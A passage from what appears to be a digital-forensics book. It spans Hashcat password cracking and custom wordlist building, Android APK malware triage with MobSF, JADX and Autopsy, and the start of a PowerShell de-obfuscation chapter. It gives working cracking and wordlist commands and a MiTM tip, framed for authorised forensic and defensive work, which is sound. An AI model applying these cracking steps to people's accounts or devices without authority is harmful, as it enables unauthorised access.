Knowing this means that if an NTLM hash was cracked using the cyclone.hashesorg.hashkiller.
combined dictionary, it will take about a month at the most for the same BitLocker password to
be cracked. This time can be significantly reduced by using a computer with multiple GPUs like
computers used for mining cryptocurrency. This is a really good reason to not have a password that
comes standard in most dictionary attacks and shows why strong and complicated passwords are
important.
This is just examining BitLocker, but VeraCrypt and DiskCryptor example hashes require the
download of a file as it is too large to display on Hashcat’s website. This shows a substantial
difference between password encryption used by Windows and robust encryption software, but
it also shows why it is very important to not reuse passwords. If an attacker can compromise the
weak Windows password and the same password is also used for robust encryption software then
the strong encryption method is very easily defeated. It also shows how a robust encryption method
can be defeated by using a good wordlist and why strong passwords are the first line of defense no
matter what encryption method is used.
¹⁰¹https://hashcat.net/wiki/doku.php?id=example_hashes
Chapter 3 - Password Cracking for Beginners 81
Complex Password Testing with Hashcat
Maybe you have gotten the bug by now and our simple hash that is just “hashcat” is not good
enough and you want to try even harder potential passwords. The easiest way to attempt to crack
more difficult passwords is to use an NTLM hash generator. Online NTLM hash generators hosted
on a website may be the easiest route, but there is a major security concern if the user wants to test
their own passwords and converts them using an online tool. By using the online tool the user has
likely given up their password to a third party if that online tool is logging input to their website. I
would only recommend using an online tool for testing passwords that the user is not using, and I
would not even use similar passwords to ones that are currently in use in an online tool.
The next best method would likely be PowerShell functions¹⁰² or Python scripts¹⁰³ that can generate
NTLM hashes. These links are just two possible ways to create an NTLM hash, but searching Google
can find other methods as well. This is much more secure as the processing to convert the password
to an NTLM hash is done on the user’s computer. Just note that if the password is cracked, it will
be saved in the potfile so it would be wise to either delete the entry from the potfile or delete the
potfile altogether once the testing session is complete.
Searching a Dictionary for a Password
Since we have already mentioned that the main weakness of a password is the existence of that
password in a wordlist, it might be nice to see if our current password or other potential password
shows up in a dictionary. Since these wordlists are very large, it is difficult to find a program that will
open them up to do a simple Ctrl + F to search the document to find the password. Fortunately, the
command line offers an easier way to search the contents of a file without opening the file. Using File
Explorer, navigate to the folder where you have downloaded and uncompressed a wordlist. Open
a command-line window just like we did for running Hashcat by clicking the white area next to
the path so that the path turns blue, type cmd, and press enter. We are going to use the findstr
command to search the contents of a dictionary. In the command line, type findstr password and
then press [TAB] until the dictionary you want to search appears. The completed command should
look something like findstr password MyDictionary. Press enter. If you chose a common password
it should output a wall of white text showing all passwords that contain that password. If it just
shows a blinking cursor, then it is searching trying to find a match. When you can type again, it has
finished searching.
This is a good way to check if a password exists in a dictionary or wordlist, but if the password does
not show up that does not necessarily mean it can’t be cracked with that dictionary. An appropriate
rule would have to be added to mangle the wordlist in a way that would cause the password to be
guessed by Hashcat. Still, since dictionary attacks are the most common and the fastest method of
cracking a password, it is a good yet simple test to see if the password is a strong password or not.
¹⁰²https://github.com/MichaelGrafnetter/DSInternals/blob/master/Documentation/PowerShell/ConvertTo-NTHash.md
¹⁰³https://www.trustedsec.com/blog/generate-an-ntlm-hash-in-3-lines-of-python/
Chapter 3 - Password Cracking for Beginners 82
Generating Custom Wordlists
Now I am going to move into a bit more advanced concepts and assume that the reader is somewhat
familiar with forensic examinations of electronic devices. Some of the more basic concepts related
to forensic exams will be overlooked when explaining these techniques, and some of the advanced
concepts will only be discussed briefly. This remaining section of this chapter is simply intended
to show what is possible and how it can be useful in a thorough examination. Two reasons for
using custom wordlists are for attacking a particularly stubborn password (good for them for using
a strong password!) or for generating a wordlist for use on forensic tools that require a static
wordlist/dictionary to attack alphanumeric passwords like are used on some Android devices.
As an example of how to use both of these techniques in a forensic examination, let’s say an examiner
has the legal authority to examine a Windows computer and an Android phone from the same
target/suspect user. Both devices are in the examiner’s possession. The drive for the computer is not
encrypted with BitLocker or other methods and the examiner was able to acquire an .E01 of the hard
drive from the computer, but the phone is locked with an alphanumeric password and unfortunately,
we have not cracked the NTLM hash with the methods already mentioned. Because the data on the
hard drive is not encrypted, there is now a wealth of information about the target including user-
generated data. It is even possible that there is simply a document saved somewhere on the hard
drive that contains the passwords for that user that may contain the Windows (NTLM) password
and the phone password. Rather than manually looking through the contents of the hard drive, there
are tools that will search the hard drive and build wordlists for us.
The first tool is the AXIOM Wordlist Generator¹⁰⁴. This requires the examiner to have access to the
Magnet AXIOM forensic software. The .E01 image will need to be processed With AXIOM Process
and then the AXIOM Wordlist Generator can be used. Instructions for how to use the AXIOM
Wordlist Generator is on their website. A free alternative that is more comprehensive but yields
more false positives is to use Bulk Extractor¹⁰⁵ with the following command: bulk_extractor -E
wordlist -o <output directory> <imagefile.E01>. For example, if the examiner had acquired an
.E01 image of a hard drive and named the acquisition HDD.E01 and wanted to output the wordlist to
a folder called Wordlist that was in the same folder as the HDD.E01 file with a terminal window open
in the same directory as the HDD.E01 file, the following command would be used: bulk_extractor -E
wordlist -o Wordlist HDD.E01. Bulk Extractor comes standard with a Kali Linux build, but is also
available on Windows. I find it is better to use a Linux box, but to each their own. A virtual machine
(VM) of Linux or other access to Kali Linux or similar can be used as nearly all Linux distributions
to include Kali Linux are free. If using a Linux VM, one option is to use Virtual Box¹⁰⁶. While a VM
can be used, it is not difficult to set up a USB thumb drive or an external hard drive with Kali Linux
or similar and change the boot order on the computer to boot to a fully functional and persistent
Kali Linux. The instructions for this procedure are on the Kali Linux website¹⁰⁷. I would recommend
this second method if you are planning on further customizing wordlists by paring them down as is
¹⁰⁴https://support.magnetforensics.com/s/article/Generate-wordlists-with-the-AXIOM-Wordlist-Generator
¹⁰⁵https://www.kali.org/tools/bulk-extractor/
¹⁰⁶https://www.virtualbox.org/
¹⁰⁷https://www.kali.org/docs/usb/live-usb-install-with-linux/
Chapter 3 - Password Cracking for Beginners 83
discussed in the next section, but a Kali VM will work as well. Once the wordlist is generated with
the preferred method (or both methods), the NTLM password from the Windows machine can be
attacked again and hopefully cracked. By using the cracked Windows password, we can then use
virtualization software to log in to the suspect machine virtually and examine the saved passwords
in Chrome, Edge, or other browsers. With the cracked NTLM and the saved browser passwords, we
now have several potential passwords for the phone. Those exact passwords could be tried on the
phone, using a forensic tool of course, but what if it was an unknown variation of those passwords?
It is also possible that we have yet to crack even the NTLM password if it is a strong password. There
is still hope if the keyword/baseword used in the password is in the wordlist we have generated. For
example, if the target password is 123456Password!@#$%^ We just have to get rid of the noise in the
custom wordlist and then mangle the wordlist in a way that will generate the target password. Kali
Linux can help us with that process.
Chapter 3 - Password Cracking for Beginners 84
Paring Down Custom Wordlists
If a really strong password has been used, then it may not be cracked even with a custom-built
wordlist using the AXIOM Wordlist Generator and Bulk Extractor to pull passwords from the target
device. It is also possible that the password uses a word from another language. If this is the case, the
examiner will need to focus their efforts even more and get rid of the “noise” in the custom wordlist.
It would also be a good idea to download a list of words for the target language. This link¹⁰⁸ is a
good place to start when looking for wordlists in other languages. A simple Google search should
also yield results for wordlists in the target language.
With all three lists (AXIOM wordlist, Bulk Extractor, and foreign language) we need to combine them
into one list. A simple copy-paste can work, but the lists may be too large to open to copy them all
into one file. Fortunately, Linux has a concatenate method that will combine files. After copying all
the files/wordlists to Kali Linux, open up a terminal window and type the following command cat
AXIOMWordlist BulkExtractorWordList ForeignLanguageWordList > CombinedWordList choosing
the correct names of the files, of course.
Now we run into the issue of potential duplicate lines. There are tools built into Linux that can
remove these duplicate lines, by using the following commands: sort CombinedWordList | uniq -d
followed by awk ‘!seen[$0]++’ CombinedWordList > CombinedWordListDedupe. The problem with
this is we run into the issue of different line endings/carriage return symbols that are used by Unix
vs Windows. A carriage return is simply the [Return] or [Enter] character at the end of a line that
tells the operating system to start a new line. Unix uses a different carriage return character than
Windows. So two lines may be identical except for the carriage return, but it won’t be recognized by
normal Linux commands and there will be duplicate lines in our wordlist. There is a program called
rling¹⁰⁹ that will need to be compiled on a Linux system. It is not in the normal distributions so a
sudo apt install from the terminal window will not work. Certain dependencies like libdv-dev
and Judy may need to be installed using the following commands: sudo apt-get update –y sudo
apt-get install -y libdb-dev for libdb-dev and sudo apt-get install libjudy-dev. The rling
command will then be run from the location it was compiled by using ./rling in that directory if
the entire rling folder is not stored in the /usr/share folder on the Linux system after compiling the
program. I would reccommend copying the rling folder to the /usr/share folder to allow it to run
from the terminal window like Hashcat or Bulk Extractor so you can call the command by simply
using rling from anywhere on the system. I understand that this is somewhat technical and I did
not go into great detail, but this is the best and fastest method that I found for deduplication that
also properly deals with carriage return issues.
Once we have chosen the deduplication method of our choice, it may be useful to change the
characters that have escaped HTML conversion back to their ASCII equivalents. What this means
is there may be a &gt inside of the passwords but what that should be is simply a >. The way
to automate this conversion is with the following command: sed -I ‘s/&gt/>/g’ WordList.txt.
¹⁰⁸https://web.archive.org/web/20120207113205/http:/www.insidepro.com/eng/download.shtml
¹⁰⁹https://github.com/Cynosureprime/rling
Chapter 3 - Password Cracking for Beginners 85
Here¹¹⁰ is a partial list of HTML names and their ASCII equivalents.
Finally, we may choose to only select potential passwords that are of a certain length. Grep can
be very useful here. By using the following command grep -x ‘.{4,16}’ WordList.txt >
AndroidPWLength.txt it will select only lines that are between 4 to 16 characters in length. By using
the following command grep -x -E -v ‘[0-9]+’ AndroidPWLength.txt > Alphanumeric.txt it will
exclude all PIN codes from the list and only select alphanumeric passwords. This final list should
be a deduplicated list of possible passwords from the AXIOM wordlist, Bulk Extractor, and foreign
language list that can be used against the Android device with the appropriate forensic tool.
Mangling Wordlists In Place
Perhaps the combined wordlist as was just mentioned still did not crack the stubborn password and
the forensic tool is being used that does not allow for rules on the fly like Hashcat. If this is the
case, the wordlist will need to be mangled in place before uploading the wordlist to the forensic
tool. Hashcat can still be used to mangle the wordlist before uploading to the forensic tool, but it
will need to be done using Linux. As was mentioned in the previous section, I prefer Kali Linux but
to each their own. The following instructions are how to mangle the wordlist in place using a Kali
Linux OS, but the location of the rule list may be different if using a different flavor of Linux.
Copy the wordlist to a Kali Linux computer and navigate to the folder that contains the wordlist
you want to mangle with the Hashcat rule of your choice. For this example, I will use Wordlist.txt
and the best64.rule rule. Open up a terminal window (if you are using the GUI instead of
the CLI to navigate) by right-clicking in the area inside of the folder and use the following
command: hashcat --force Wordlist.txt -r /usr/share/hashcat/rules/best64.rule --stdout
> Wordlist_best64.txt and hit enter. Once the iteration is complete, the file Wordlist_best64.txt
will be created and will contain all of the iterations of Wordlist.txt with the best64.rule rule used
against it so that a straight dictionary attack can be used. Keep in mind that this can quickly create
massive files even out of smaller wordlists, so that is why I am using the much smaller rule set of
base64.rule rather than the onerulestorulethemall.rule. If even the standard smaller rules create
wordlists that are too big to use on the forensic tool, then custom rules can be created. For example,
a file named append_exclamation.rule containing only two lines of : and $! (each on their own
line) would append an exclamation point to every word in a wordlist so it would double the size
of the list. More information on how to mangle wordlists using Hashcat can be found at this blog
post¹¹¹. It might also be useful to make sure that there are no duplicates by using rling against the
wordlist again. Additionally, if a max password length is known it would be good to use grep to
remove passwords that are too long as was mentioned in the previous section.
¹¹⁰https://ascii.cl/htmlcodes.htm
¹¹¹https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-custom-wordlists/
Chapter 3 - Password Cracking for Beginners 86
Additional Resources and Advanced Techniques
Building Wordlists from RAM
While it is pretty much required to have the admin password from a computer to acquire RAM,
if RAM has been acquired on a system and there is a need to crack an additional password other
than the known admin password, RAM can be a great resource to build a custom wordlist for that
system. Once again, Linux is also a useful tool for this. The basic process is to use an uncompressed
RAM capture and extract possible passwords by using the strings command to look for possible
passwords. Linux can also deduplicate these possible passwords. An example command would look
like strings Memory_file | sort | uniq > RAMwordlist.txt where ‘Memory_file’ is the name of
the uncompressed memory image. Then the generated wordlist can be used in Hashcat just like a
dictionary attack. For more info, check out a great video¹¹² on the topic by DFIRScience.
Crunch for Generating Random Wordlists
Crunch¹¹³ is a Kali Linux package that allows for the generation of wordlists using a predefined set
of characters and only of a specific length. This can be useful if certain characters are known or if
the length of the password is known. It is a bit simpler than using rules in Hashcat, it is easy to
use, and it is quite useful for lists of only a few characters in length. It is similar to generating a
list for brute-forcing a password which has limitations already discussed, but it can be useful. From
the terminal window on a Linux machine simply type the command sudo apt install crunch to
install. The example on their home page shows the command crunch 6 6 0123456789abcdef -o
6chars.txt generating a list of all combinations and permutations of all digits and the letters a-f
and outputting the results to a file.
Combinator Attacks and More by 13Cubed
The 13Cubed YouTube channel¹¹⁴ has excellent and in-depth information on numerous digital
forensics concepts. One of his videos covers how to concatenate words together to crack passwords
that may consist of several words strung together. He also goes over some more advanced topics
and concepts related to using Hashcat, check out the first of his two-part series on Hashcat¹¹⁵.
John the Ripper
John the Ripper is similar to Hashcat in many ways but where I think it really shines is for hash
extraction to start the process of cracking a password. John the Ripper can also be used instead
of Hashcat to crack the actual hash, and it can also mangle wordlists in a similar fashion to the
previously described method of using Hashcat on a Linux machine. More info on John the Ripper
can be found on their website¹¹⁶.
¹¹²https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience
¹¹³https://www.kali.org/tools/crunch/
¹¹⁴https://www.youtube.com/c/13cubed
¹¹⁵https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed
¹¹⁶https://www.openwall.com/john/
Chapter 3 - Password Cracking for Beginners 87
Conclusion
This has just been a brief dive into showing how easy it is to crack simple passwords and hopefully
will show why strong passwords are so important. The Windows operating system uses a weak form
of encryption for its passwords, and this is a place to start when trying to crack passwords for fun or
security testing purposes. Even with strong encryption methods, a weak or reused password will not
be sufficient to safeguard the data. Knowing these methods are out there to defeat user passwords
should show the user why it is so important to use strong passwords and why it is a bad idea to
reuse passwords between accounts. A better understanding of the attack methods against passwords
should encourage everyone to use better security practices to safeguard their data.
References
Cubrilovic, N. C. (2009, December 14). TechCrunch is part of the Yahoo family of brands. Retrieved
May 12, 2022, from TechCrunch¹¹⁷
crunch | Kali Linux Tools. (2021, September 14). Retrieved July 1, 2022, from Kali Linux¹¹⁸
Fast password cracking - Hashcat wordlists from RAM. (2022, June 15). Retrieved June 22, 2022, from
YouTube¹¹⁹
Introduction to Hashcat. (2017, July 20). Retrieved June 22, 2022, from YouTube¹²⁰
John the Ripper password cracker. (n.d.). Retrieved June 22, 2022, from John the Ripper¹²¹
Harley (2020, November 16). Using Hashcat Rules to Create Custom Wordlists. Infinite Logins. Re-
trieved September 8, 2022, from https://infinitelogins.com/2020/11/16/using-hashcat-rules-to-create-
custom-wordlists/
hashcat - advanced password recovery. (n.d.). Retrieved May 12, 2022, from Hashcat¹²²
Patton, B. (2022, March 25). NTLM authentication: What it is and why you should avoid using it.
Retrieved May 12, 2022, from The Quest Blog¹²³
Picolet, J. (2019). Hash Crack: Password Cracking Manual (v3). Independently published.
W34kp455. (2014). Weakpass. Retrieved May 12, 2022, from Weakpass¹²⁴
¹¹⁷https://techcrunch.com/2009/12/14/rockyou-hack-security-myspace-facebook-passwords/
¹¹⁸https://www.kali.org/tools/crunch/
¹¹⁹https://www.youtube.com/watch?v=lOTDevvqOq0&ab_channel=DFIRScience
¹²⁰https://www.youtube.com/watch?v=EfqJCKWtGiU&ab_channel=13Cubed
¹²¹https://www.openwall.com/john/
¹²²https://hashcat.net/hashcat/
¹²³https://blog.quest.com/ntlm-authentication-what-it-is-and-why-you-should-avoid-using-it/
¹²⁴https://weakpass.com/
Chapter 4 - Large Scale Android
Application Analysis
By s3raph¹²⁵ | Website¹²⁶ | Discord¹²⁷
Overview
This chapter provides a cursory overview of Android application analysis through automated and
manual methods followed by a methodology of adjusting to scale.
Introduction
Mobile forensics, specifically as it pertains to Android devices, tends to focus a little more heavily
on application analysis during the initial evaluation. Unlike Windows systems, the sandbox nature
of the devices (assuming they aren’t and/or can’t be easily rooted), makes it a little more difficult to
gain a deeper forensic image without first compromising an existing application (such as malicious
webpages targeting exploits in Chrome or through hijacking an insecure update process in a given
application), utilizing a debugging or built-in administrative function, or through installing an
application with greater permissions (both methods would still require privilege escalation to root). A
typical stock Android phone had at least between 60 to 100+ applications installed at any given time,
while more recent phones have more than 100+. This includes system applications maintained by
Google, device/manufacturer applications such as with Huawei or Samsung, and network provider
¹²⁵https://github.com/s3raph-x00/
¹²⁶https://www.s3raph.com/
¹²⁷http://discordapp.com/users/598660199062044687
Chapter 4 - Large Scale Android Application Analysis 89
applications such as with Sprint, Vodafone, or Verizon. Additionally, device manufacturers and
network provides typically have agreements with various companies, such as Facebook, to preinstall
their application during device provisioning. Most of these applications cannot be easily pulled
during forensic analysis without utilizing some method of physical extraction (i.e., use of Qualcomm
Debugger functionality) or root access.
Part 1 - Automated Analysis
If during a forensic analysis you are lucky enough to get all of the Android applications resident
on the system, you are left with the problem of analyzing more than 100+ applications. Most
Android application analysis tools typically are developed to do automated analysis of individual
applications with some ability to do a comparative analysis of two APKs. In this space, MobSF¹²⁸ is
considered one of the most popular application analysis tools. This tool does provide a method for
dynamically generating an automated analysis of various APKs with varying levels of success with
both automated static and dynamic analysis. Installation of this tool is fairly easy and the developer
has fairly robust documentation.
(Please refer to: https://mobsf.github.io/docs/#/installation) for the most up to date instruc-
tions. The installation instructions following works at the moment:
sudo apt-get install git python3.8 openjdk-8-jdk python3-dev python3-venv python
3-pip build-essential libffi-dev libssl-dev libxml2-dev libxslt1-dev libjpeg8-dev z
lib1g-dev wkhtmltopdf
git clone https://github.com/MobSF/Mobile-Security-Framework-MobSF.git
cd Mobile-Security-Framework-MobSF
sudo ./setup.sh
If you plan on installing this on a VM, please note that dynamic analysis is not really
supported. If you were able to modify MobSF to run in a VM, there is signficant probability
of specific functionality failing to properly execute and any results would not be consistent
or trustworthy. Personally, I use my own virtualized environment separate from MobSF
which will potentially be discussed in another guide.
¹²⁸https://github.com/MobSF/Mobile-Security-Framework-MobSF
Chapter 4 - Large Scale Android Application Analysis 90
Once installed, you can run MobSF with the following simple command within the MobSF directory
<Mobile-Security-Framework-MobSF>.
./run.sh
Additionally, you can specify the listening address and listening port as MobSF starts its own web
server for user interaction. The following default setting will be used if the command is started
without arguments:
0.0.0.0:8000
Example post run:
Accessing the hosted webpage with your favorite browser shows the following webpage:
Chapter 4 - Large Scale Android Application Analysis 91
From here, you can upload the binary to the MobSF instance in your virtual machine:
From here, most times the webpage will time out so click Recent Scans which shows the following:
Chapter 4 - Large Scale Android Application Analysis 92
Because we are in a VM, the dynamic report will be unavailable but the static report should provide
the primary details for initial triage of the application. After a few minutes and depending on the
size of the application, the report will be ready for analysis:
Now for analysis of malware, there are a number of websites hosting samples for training and tool
development but I have typically found vx-underground.org¹²⁹ fairly robust.
¹²⁹https://www.vx-underground.org/
Chapter 4 - Large Scale Android Application Analysis 93
The malware needs to be extracted with the password infected and renamed with the extension
.apk. The scan by MobSF showed the following details:
There are two options to view either a Static Report or Dynamic Report. Because we are in a virtual
machine, there will not be an available Dynamic report. The Static Report shows the following
information:
Outside of the calculated hashes, the actual information needed for an assessment is further down:
Chapter 4 - Large Scale Android Application Analysis 94
The section in the above right shows that MobSF stored the decompiled Java code which can be
compared to the results and referenced later. The section below shows the signing certificate has an
unusual xuhang string in almost all of the issuer information. The next section of interest is related
to the requested permissions:
Permissions such as MOUNT_UNMOUNT_FILESYSTEMS for what appears to be a game looks incredibly
unusual.
Other sections of interest include various API functions that could potentially indicate application
capabilities.
Chapter 4 - Large Scale Android Application Analysis 95
For example, clicking on the com/g/bl.java shows the following code segment:
Generally speaking, the function to pass commands to /system/bin/sh should be scrutinized and
typically is indicative of malicious intent. This isn’t always the case as applications that provide
system functionality typically use sh as a means to use native Android OS tools such as ping.
Chapter 4 - Large Scale Android Application Analysis 96
Another area of concern is the collection and sending of sensitive device information to include the
IMSI and wireless MAC address:
While the functions and information accessed appear malicious, validating any suppositions with
actual evidence of malicious intent would be prudent. The additional analysis is beyond the scope
of this initial writeup but is typical of most malware analysis methodologies.
Chapter 4 - Large Scale Android Application Analysis 97
Part 2 - Manual Analysis
Now that we have done some initial analysis of an APK with an automate tool such as MobSF, let’s
dive into doing some manual analysis using JADX¹³⁰. JADX is an APK decompiler that converts
compiled APKs and DEX files into readable decomplied code. The source code and compiled releases
for JADX provides both a CLI and GUI based application that runs on Linux, macOS, and Windows.
After opening one of the APKs within JADX a breakdown of the stored decompiled code, resources,
and embedded files can be seen:
Whether malicious or not, most Android applications have some level of obfuscation. In this case,
the major programmatic functionality is not obfuscated but the names of the classes (a, b, c, etc.) do
not have significant meaning and can make initial analysis more difficult:
¹³⁰https://github.com/skylot/jadx
Chapter 4 - Large Scale Android Application Analysis 98
One area that should be checked is the APK signature and certificate details:
This matches what MobSF had reported. It is possible to get differing results from different tools so
double/triple checking relevant details is important.
Another area for analysis is the AndroidManifest.XML file stored within the Resources folder
structure:
Chapter 4 - Large Scale Android Application Analysis 99
Here we see the same significant number of permissions along with some third-party
application app keys which appear to be directly associated to the following GitHub repository:
https://github.com/angcyo/umeng. Interestingly, the following topic on Alibaba cloud references
both the WRITE_EXTERNAL_STORAGE permission as required to dynamically update APKs
using UMENG and the associated APPKEY: https://topic.alibabacloud.com/a/use-umeng-to-
automatically-update-apk-and-umeng-apk_1_21_32538466.html.
Chapter 4 - Large Scale Android Application Analysis 100
This obviously has the implication, if true, that even if there is not malicious logic baked directly into
the application during dynamic and static analysis that the application could be manipulated at any
later time. Beyond this initial triage is out of scope for the write-up but this portion of analysis
is important to highlight the need for manual analysis and need to read contextual clues. Any
automation should be validated and checked regardless of scaling.
Chapter 4 - Large Scale Android Application Analysis 101
While usually successful, it should be noted that JADX cannot always decompile the compiled code
to Java and any errors should be parsed to ensure that the uncompiled code does not have any
malicious logic. The following screenshot shows a typical de-compilation error:
The concept of this writeup was to provide a cursory analysis of a piece of malware that would
provide the foundation of automating large scale analysis of APKs. The foundation begins at
minimum with some of the above techniques (permissions and signatures) but also on basic threat
hunting aspects such as searching for various exploitation techniques and indicators of compromise.
In that sense, hard coded references to /system/bin/sh, hard coded IP addresses, and unusual
permissions are fairly easy using the built-in search functionality:
Chapter 4 - Large Scale Android Application Analysis 102
I would recommend enabling searching within comments as sometimes additional functionality
using external APIs and websites are simply commented out but otherwise accessible.
Problem of Scale
So far, we have covered the bare basics of using MobSF to analyze an APK as well as how to
manually interrogate the same APK using JADX. In most malware mobile forensic investigations
with physical access (not logical) most stock Android phones have more than 100+ APKs (including
system applications, device manufacturer applications, network provider applications, and third-
party applications) that could need to be analyzed. Devices in active usage could reach beyond 200+
APKs that could potentially need to be analyzed. 200+ APKs is a significant number of applications
for a malware forensic analysis but the investigation could be completed using MobSF and JADX in
a few weeks. The problem comes at scale by expanding the number of devices being analyzed. Now
you may have 100+ devices, each with 100+ APKs that may or may not be the same version. This
quickly becomes untenable which results in a need to develop or adapt mobile application analysis
methodology to scale.
Chapter 4 - Large Scale Android Application Analysis 103
Part 3 - Using Autopsy, Jadx, and Python to Scrap and
Parse Android Applications at Scale
The last scenario isn’t a hypothetical one, it is one that I had to adjust and adapt methodology for.
To start with the forensic analysis, you need to have an Android image to work with. If you have
one saved from a test device using Cellebrite that can be used to test and develop the solution at
scale. If you don’t, you can simply pull a virtual machine from osboxes.org¹³¹. Keep in mind there
are significant differences between x86 and ARM architectures and Android versions so don’t be
hyper specific in file locations and file names.
Pro-Tip: Using an Android VM (either from osboxes.org or another source) along with a host-
only network adapter can allow you to capture and manipulate network traffic (including
some SSL encrypted traffic) by using your brand of network collection (Security Onion¹³²
or simple WireShark¹³³) and a MiTM proxy with SSLStrip ([BetterCap¹³⁴). Combined with
a code injection tool with memory reading capabilities (Frida¹³⁵) this can be the foundation
of more advanced dynamic analysis methodologies.
Once you have the appropriate image file (vmdk, bin, img, etc.), you can create a new case within
Autopsy:
¹³¹https://www.osboxes.org/android-x86/
¹³²https://github.com/Security-Onion-Solutions/securityonion
¹³³https://gitlab.com/wireshark/wireshark
¹³⁴https://github.com/bettercap/bettercap
¹³⁵https://github.com/frida/frida
Chapter 4 - Large Scale Android Application Analysis 104
Select Disk Image or VM file as seen below:
Chapter 4 - Large Scale Android Application Analysis 105
Select the appropriate image file:
Select the appropriate Ingest Modules (you can leave this default for now; we will come back here).
Chapter 4 - Large Scale Android Application Analysis 106
Continue through the default options until the data source is ingested as seen below:
At this point we have the basic test and development case setup. Now it is time to start developing
a solution to the problem of scale. The first portion of the problem is to find a relatively simple
and automated solution to pull APK files from data sources. Autopsy has a specific capability
that it allows you to use specifically designed Python plugins to automate such tasks. By using
public examples (such as https://github.com/markmckinnon/Autopsy-Plugins), I modified one of
the simpler Python scripts to search for and flag files with the .apk extension (amongst others):
Chapter 4 - Large Scale Android Application Analysis 107
Please Note: In the script referenced above is a hardcoded file location to pull the found
files to. This must be modified to match your system. Dynamically pulling the folder
location appeared too difficult at the time due to Autopsy using modified Python methods
that are cross compiled into Java (things get weird). Additionally, the following wiki¹³⁶
hasn’t really been updated so a significant amount of testing is needed. To aid in your
troubleshooting, the location of the log file can be accessed by going to the case folder:
¹³⁶http://www.sleuthkit.org/autopsy/docs/api-docs/4.9.0/
Chapter 4 - Large Scale Android Application Analysis 108
Going to the log folder:
Chapter 4 - Large Scale Android Application Analysis 109
Finally, opening one of the plain text log files:
Unfortunately, this file is locked while Autopsy is running and you must close Autopsy to view any
associated error.
Once a Python script has been developed and tested, you have to manually add in the Python plugin
to the appropriate folder. A simple link can be accessed from the menu option below:
Chapter 4 - Large Scale Android Application Analysis 110
To add the python plugin, you simply move an appropriate named folder structure containing the
python modules into the following directory:
Now simply restart Autopsy and right click the data source you wish to run the plugin against:
Chapter 4 - Large Scale Android Application Analysis 111
Similar to before, if all is well a new option should be present:
Now simply click Deselect All (since they have already run) and click your custom tool. If you are
using a barebones osboxes VM it would be prudent to add some various APKs. Once the module
finished running you should see the following:
Chapter 4 - Large Scale Android Application Analysis 112
So now we have a way to automate scraping of APK files, to continue now we need to do some
rudimentary analysis. Remember how JADX had a CLI? This functionality can help decompile the
APKs fairly quickly allowing for additional analysis using REGEX, individual file hashing, and other
forensicating things. In this situation, I developed a companion script using Python (YAAAAT_-
apk_ripper) that has embedded the functionalities required for my use case Yet Another Android
Application Tool¹³⁷:
The following code section shows the functionality of running JADX and dumping the output to the
case_extract folder:
¹³⁷https://github.com/s3raph-x00/YAAAAT
Chapter 4 - Large Scale Android Application Analysis 113
This script works by iteratively going through the case_extract/apk folder structure and attempts
to be fairly fault tolerant in the case of incorrect file extension or file corruption.
Beyond the simple JADX decompiling functionality, additional functions can be added by analyzing
the code sections of the decompiled APK using REGEX:
The above code section attempts to find high confidence URLs within the code base and extract the
information to a mapped log file for manual analysis. There are other regex solutions to map out
potential URLs which helps mitigate missing aspects of URL crafting.
Besides JADX, to parse embedded certificates (for APK signature analysis and potential Certificate
pinning implmenetations) the script incorporates Java keytool if Java JDK is present and some
methods using OpenSSL if not:
Chapter 4 - Large Scale Android Application Analysis 114
The methods aren’t perfect by any means and more testing across a number of different certificate
implementations are needed. Despite this, it is similar to the automated single analysis using MobSF
and manual analysis with JADX but also allows for larger scale analysis of APK signatures.
This script is far from perfect or complete but foundationally provided the basic methodology to
extract specific information desired for large-scale analysis. The usage of Splunk becomes useful in
this context as the data contained in the text files can be ingested and parsed allowing for larger-scale
analysis in areas such as granular file changes in the embedded APKs, the addition of URLs and IP
addresses, and other anomalies. This write-up does not go into extensive detail about every specific
use case but hopefully given enough time, effort, and data you can scale the application analysis
methodology to suit your needs. Regardless of the implementation, Android APIs and APKs are
changing frequently so ensure to retest solutions and manually spot-check results to ensure it still
fits the goal of the solution.
Chapter 5 - De-Obfuscating
PowerShell Payloads
By Tristram¹³⁸ | Twitter¹³⁹ | Discord¹⁴⁰
Introduction
I have had the pleasure of working with many individuals within the cyber security field, belonging
to both the blue and red teams, respectively.
Regardless of which side you prefer to operate on, whether you’re a penetration tester looking to
put an organization’s security program to the test or a blue teamer looking to stomp on adversaries
during every step of their desired campaign, we are ultimately on the same side. We are advisors to
risk and we offer guidance on how to eliminate that risk; the difference is being how we respond.
We are ultimately on the same team, operating as one entity to ensure the security and integrity
of the organizations we serve and the data that they protect. Part of how we work towards this
common goal is through professional development and imparting our knowledge to others. Projects
such as this are an example of why our security community is strong. We care, we learn, we grow.
Together, there is nothing that will stop us from being successful.
As an individual who is primarily a blue teamer with roots in penetration testing, I am looking to
impart unto you some of the common scenarios that I have faced that I feel would help provide you
the foundation and confidence you’re looking for to comfortably break down obfuscated PowerShell
payloads.
¹³⁸https://github.com/gh0x0st
¹³⁹https://twitter.com/jdtristram
¹⁴⁰http://discordapp.com/users/789232435874496562
Chapter 5 - De-Obfuscating PowerShell Payloads 116
What Are We Dealing With?
PowerShell is a powerful scripting language that has eased the process of managing Windows
systems. These management capabilities have evolved over years as PowerShell has expanded from
its exclusive Windows roots and has become accessible on other systems such as macOS and Linux.
Despite the technological advances this solution has provided system administrators over the years,
it has also provided penetration testers and cyber criminals similar opportunities to be successful.
